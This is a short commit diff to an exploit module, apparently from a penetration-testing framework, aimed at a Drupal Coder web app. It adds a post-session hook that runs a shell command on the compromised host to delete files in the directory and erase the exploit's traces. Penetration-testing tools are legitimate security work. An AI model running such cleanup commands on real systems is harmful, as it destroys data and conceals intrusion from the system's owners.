Clean up after yourself

wvu · wvu · commit 4228868c2955 · 2016-08-16T23:09:14.000-05:00
Can't use FileDropper. :(
diff --git a/modules/exploits/unix/webapp/drupal_coder_exec.rb b/modules/exploits/unix/webapp/drupal_coder_exec.rb
@@ -98,4 +98,12 @@ def exploit
       }
     )
   end
+
+  # XXX: FileDropper can't handle weird filenames
+  def on_new_session(session)
+    # This find command should be decently portable...
+    command = '[ -f coder_upgrade.run.php ] && find . \! -name coder_upgrade.run.php -delete'
+    print_status("Cleaning up: #{command}")
+    session.shell_command_token(command)
+  end
 end

Original file line number	Diff line number	Diff line change
`@@ -98,4 +98,12 @@ def exploit`
`98`	`98`	`}`
`99`	`99`	`)`
`100`	`100`	`end`
	`101`	`+`
	`102`	`+ # XXX: FileDropper can't handle weird filenames`
	`103`	`+ def on_new_session(session)`
	`104`	`+ # This find command should be decently portable...`
	`105`	`+ command = '[ -f coder_upgrade.run.php ] && find . \! -name coder_upgrade.run.php -delete'`
	`106`	`+ print_status("Cleaning up: #{command}")`
	`107`	`+ session.shell_command_token(command)`
	`108`	`+ end`
`101`	`109`	`end`